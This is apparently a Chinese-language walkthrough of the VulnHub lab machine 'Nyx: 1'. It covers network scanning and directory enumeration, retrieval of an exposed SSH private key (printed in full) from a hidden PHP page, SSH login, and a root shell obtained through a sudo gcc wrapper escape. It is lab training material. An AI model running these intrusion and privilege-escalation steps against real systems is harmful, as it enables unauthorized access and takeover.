Nyx
作者: jason_huawen
靶机信息
名称:Nyx: 1
地址:
https://www.vulnhub.com/entry/nyx-1,535/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:a4:46:78 1 60 PCS Systemtechnik GmbH
192.168.56.194 08:00:27:f7:91:3e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.194
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.194 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 08:47 EST
Nmap scan report for 192.168.56.194
Host is up (0.000069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fc8b87f436cd7d0fd8f31615a947f10b (RSA)
| 256 b45c089602c6a80b01fd4968ddaafb3a (ECDSA)
|_ 256 cbbf2293697660a47dc019f3c715e73c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: nyx
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F7:91:3E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ curl http://192.168.56.194
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>nyx</title>
</head>
<body>
<body bgcolor="#000000">
<center>
<font color="#e60000">
<pre>
███▄▄▄▄ ▄██ ▄ ▀████ ▐████▀
███▀▀▀██▄ ███ ██▄ ███▌ ████▀
███ ███ ███▄▄▄███ ███ ▐███
███ ███ ▀▀▀▀▀▀███ ▀███▄███▀
███ ███ ▄██ ███ ████▀██▄
███ ███ ███ ███ ▐███ ▀███
███ ███ ███ ███ ▄███ ███▄
▀█ █▀ ▀█████▀ ████ ███▄
Happy pwning :D
</pre>
<font>
</center>
</body>
</html>
<!-- Dont waste your time looking into source codes/robots.txt etc , focus on real stuff -->
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ curl http://192.168.56.194/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.194 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ nikto -h http://192.168.56.194
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.194
+ Target Hostname: 192.168.56.194
+ Target Port: 80
+ Start Time: 2023-02-03 08:49:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 3c5, size: 5acde48676ca6, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-02-03 08:50:36 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ gobuster dir -u http://192.168.56.194 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.194
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,txt,php,html
[+] Timeout: 10s
===============================================================
2023/02/03 08:51:04 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 965]
/key.php (Status: 200) [Size: 287]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1098748 / 1102805 (99.63%)===============================================================
2023/02/03 08:53:06 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ dirb http://192.168.56.194
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Feb 3 08:53:18 2023
URL_BASE: http://192.168.56.194/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.194/ ----
+ http://192.168.56.194/index.html (CODE:200|SIZE:965)
+ http://192.168.56.194/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Fri Feb 3 08:53:19 2023
DOWNLOADED: 4612 - FOUND: 2
发现了key.php文件,尝试SQL注入等方法都失败
参考其他人解法,用nmap的脚本进行扫描
──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ nmap -p 80 --script=http-enum 192.168.56.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 09:08 EST
Nmap scan report for 192.168.56.194
Host is up (0.00036s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
|_ /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability
Nmap done: 1 IP address (1 host up) scanned in 7.03 seconds
发现了一个特殊文件,访问该文件,为ssh 私钥
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ curl http://192.168.56.194/d41d8cd98f00b204e9800998ecf8427e.php
<title>mpampis key</title>
<pre>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7T94TmbqiRlc6jGh6UOKyKVux+bYoskAdOybtgCfoh064CTHLTMT
HNnXWI8sT1Ml19svvVGnZZKmDTbS/7uOpgsmvO0pmqirCVo0UvD0YhKXVEwkTtmUvPBPAX
ucGRtefJcCtLWnSc4yMtzbYzSYEultUW5EfqqTwfjh48fxvLk1/kznO7EknxpLMupf6hJz
NbGLLbRwINeIjdC0k6iMdMrZ3n58Cho3kigNKSqcyBpkePE+RvnCBegtxBX/m1pUjPjYKY
zdZ0DROQyU3t7Wu6iX4TW688adHjAgXP7ERN0tL6RoJB9vHxO1GmGt5CLoJBYND1uLoTRe
p7xkIPwwgwAAA8iiu9/dorvf3QAAAAdzc2gtcnNhAAABAQDtP3hOZuqJGVzqMaHpQ4rIpW
7H5tiiyQB07Ju2AJ+iHTrgJMctMxMc2ddYjyxPUyXX2y+9UadlkqYNNtL/u46mCya87Sma
qKsJWjRS8PRiEpdUTCRO2ZS88E8Be5wZG158lwK0tadJzjIy3NtjNJgS6W1RbkR+qpPB+O
Hjx/G8uTX+TOc7sSSfGksy6l/qEnM1sYsttHAg14iN0LSTqIx0ytnefnwKGjeSKA0pKpzI
GmR48T5G+cIF6C3EFf+bWlSM+NgpjN1nQNE5DJTe3ta7qJfhNbrzxp0eMCBc/sRE3S0vpG
gkH28fE7UaYa3kIugkFg0PW4uhNF6nvGQg/DCDAAAAAwEAAQAAAQAaUzieOn07yTyuH+O/
Zmc37GNmew7+wR7z2m1MvLT54BRwWqRfN5OfV+y1Pu3Dv44rbX7WmwDgHG2gebzf84fYlN
QvkoFTT/Pqjb/QlDwJxdZU3D4LIcmHTYL2vyiLAKZzXK5ILv/pCKA5VJhjYaqeLpiauImR
JIxQsbUe+UixkATg7u3c/lkPH4p7POb7JJVbemKO07vzUSK3wzMWSukZs5ZZXKH8L5ypSy
CxPe4AUaO5IuXeKPeq45Q7lUvVKAFdxte438jup4YeyS7lbi2+BggJLt3W4jAlrWxaDhK3
/EICCIT8zLt+baltm/xrfiRM2OxTP2S/6/AQlkbSOaBBAAAAgQDTmKPk3pBpmR0tm5KmSK
6ubJkOfjcVwsLlZcVDHOcFIrgbNkEZPqqEnnRQD7BSBz0I05L1H8VgDR4ZkkgVqKmePhI9
Fs3NVsCasih8UubG2TTsGcvOalU+X6zagDiGWxxLNrQ81NBmCUBWPB/dFG+dUo9T0XigNQ
1lD1s4trUG6QAAAIEA/BlxOWPyLx4UHGO7RrrKEjWKpw2Ma6iRbQOo5HfmrJ+mZvUP+qBs
+Qgj3g+Qgt6y+EH67oxWeX/xTti1xHAc0Qx59181QrBFojp0XWtRumhASFC/TceBuP1fYe
DIZ6gYNXN/Pw7PFKStceO/Qhmee+K1/6XRwEvRSvXKG5a7sQ8AAACBAPDrM5bkjXYD9cq7
xfkT1t16YzqK9BmgFgSyOFQjtqFuLt4JtsQhPfip2QZkSCyPk8cVNx74Wvs4rxYl5pacmf
CR8v83WYMc6h4oBLmcxZsxMpaP8B/N7DZeS76A6idz+Cdj6BTmgMh7xFTXQOgB6Gh9LZmE
KXo/rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
</pre>
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ vim id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7T94TmbqiRlc6jGh6UOKyKVux+bYoskAdOybtgCfoh064CTHLTMT
HNnXWI8sT1Ml19svvVGnZZKmDTbS/7uOpgsmvO0pmqirCVo0UvD0YhKXVEwkTtmUvPBPAX
ucGRtefJcCtLWnSc4yMtzbYzSYEultUW5EfqqTwfjh48fxvLk1/kznO7EknxpLMupf6hJz
NbGLLbRwINeIjdC0k6iMdMrZ3n58Cho3kigNKSqcyBpkePE+RvnCBegtxBX/m1pUjPjYKY
zdZ0DROQyU3t7Wu6iX4TW688adHjAgXP7ERN0tL6RoJB9vHxO1GmGt5CLoJBYND1uLoTRe
p7xkIPwwgwAAA8iiu9/dorvf3QAAAAdzc2gtcnNhAAABAQDtP3hOZuqJGVzqMaHpQ4rIpW
7H5tiiyQB07Ju2AJ+iHTrgJMctMxMc2ddYjyxPUyXX2y+9UadlkqYNNtL/u46mCya87Sma
qKsJWjRS8PRiEpdUTCRO2ZS88E8Be5wZG158lwK0tadJzjIy3NtjNJgS6W1RbkR+qpPB+O
Hjx/G8uTX+TOc7sSSfGksy6l/qEnM1sYsttHAg14iN0LSTqIx0ytnefnwKGjeSKA0pKpzI
GmR48T5G+cIF6C3EFf+bWlSM+NgpjN1nQNE5DJTe3ta7qJfhNbrzxp0eMCBc/sRE3S0vpG
gkH28fE7UaYa3kIugkFg0PW4uhNF6nvGQg/DCDAAAAAwEAAQAAAQAaUzieOn07yTyuH+O/
Zmc37GNmew7+wR7z2m1MvLT54BRwWqRfN5OfV+y1Pu3Dv44rbX7WmwDgHG2gebzf84fYlN
QvkoFTT/Pqjb/QlDwJxdZU3D4LIcmHTYL2vyiLAKZzXK5ILv/pCKA5VJhjYaqeLpiauImR
JIxQsbUe+UixkATg7u3c/lkPH4p7POb7JJVbemKO07vzUSK3wzMWSukZs5ZZXKH8L5ypSy
CxPe4AUaO5IuXeKPeq45Q7lUvVKAFdxte438jup4YeyS7lbi2+BggJLt3W4jAlrWxaDhK3
/EICCIT8zLt+baltm/xrfiRM2OxTP2S/6/AQlkbSOaBBAAAAgQDTmKPk3pBpmR0tm5KmSK
6ubJkOfjcVwsLlZcVDHOcFIrgbNkEZPqqEnnRQD7BSBz0I05L1H8VgDR4ZkkgVqKmePhI9
Fs3NVsCasih8UubG2TTsGcvOalU+X6zagDiGWxxLNrQ81NBmCUBWPB/dFG+dUo9T0XigNQ
1lD1s4trUG6QAAAIEA/BlxOWPyLx4UHGO7RrrKEjWKpw2Ma6iRbQOo5HfmrJ+mZvUP+qBs
+Qgj3g+Qgt6y+EH67oxWeX/xTti1xHAc0Qx59181QrBFojp0XWtRumhASFC/TceBuP1fYe
DIZ6gYNXN/Pw7PFKStceO/Qhmee+K1/6XRwEvRSvXKG5a7sQ8AAACBAPDrM5bkjXYD9cq7
xfkT1t16YzqK9BmgFgSyOFQjtqFuLt4JtsQhPfip2QZkSCyPk8cVNx74Wvs4rxYl5pacmf
CR8v83WYMc6h4oBLmcxZsxMpaP8B/N7DZeS76A6idz+Cdj6BTmgMh7xFTXQOgB6Gh9LZmE
KXo/rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ chmod 400 id_rsa
而这个奇怪文件的title告诉我们用户名
┌──(kali㉿kali)-[~/Vulnhub/Nyx]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.56.194 (192.168.56.194)' can't be established.
ED25519 key fingerprint is SHA256:y+UuWVNQjou5NV3bhJKmkFBqomxtGR0c5ydJPwmIz+E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.194' (ED25519) to the list of known hosts.
Linux nyx 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
███▄▄▄▄ ▄██ ▄ ▀████ ▐████▀
███▀▀▀██▄ ███ ██▄ ███▌ ████▀
███ ███ ███▄▄▄███ ███ ▐███
███ ███ ▀▀▀▀▀▀███ ▀███▄███▀
███ ███ ▄██ ███ ████▀██▄
███ ███ ███ ███ ▐███ ▀███
███ ███ ███ ███ ▄███ ███▄
▀█ █▀ ▀█████▀ ████ ███▄
Last login: Fri Aug 14 19:15:05 2020 from 192.168.1.18
mpampis@nyx:~$ id
uid=1000(mpampis) gid=1000(mpampis) groups=1000(mpampis),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for mpampis on nyx:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mpampis may run the following commands on nyx:
(root) NOPASSWD: /usr/bin/gcc
mpampis@nyx:/tmp$ sudo /usr/bin/gcc -wrapper /bin/sh,-s .
# cd /root
# ls -alh
total 24K
drwx------ 3 root root 4.0K Aug 14 2020 .
drwxr-xr-x 18 root root 4.0K Aug 14 2020 ..
-rw------- 1 root root 0 Aug 14 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 14 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 0 Aug 14 2020 root.txt
-rw-r--r-- 1 root root 168 Aug 14 2020 .wget-hsts
# cat root.txt
#
经验教训
-
在扫描得到key.php文件后,认为这应该是突破口,但是尝试各种方法失败,应该想其他办法
-
本靶机利用到了nmap http-enum扫描脚本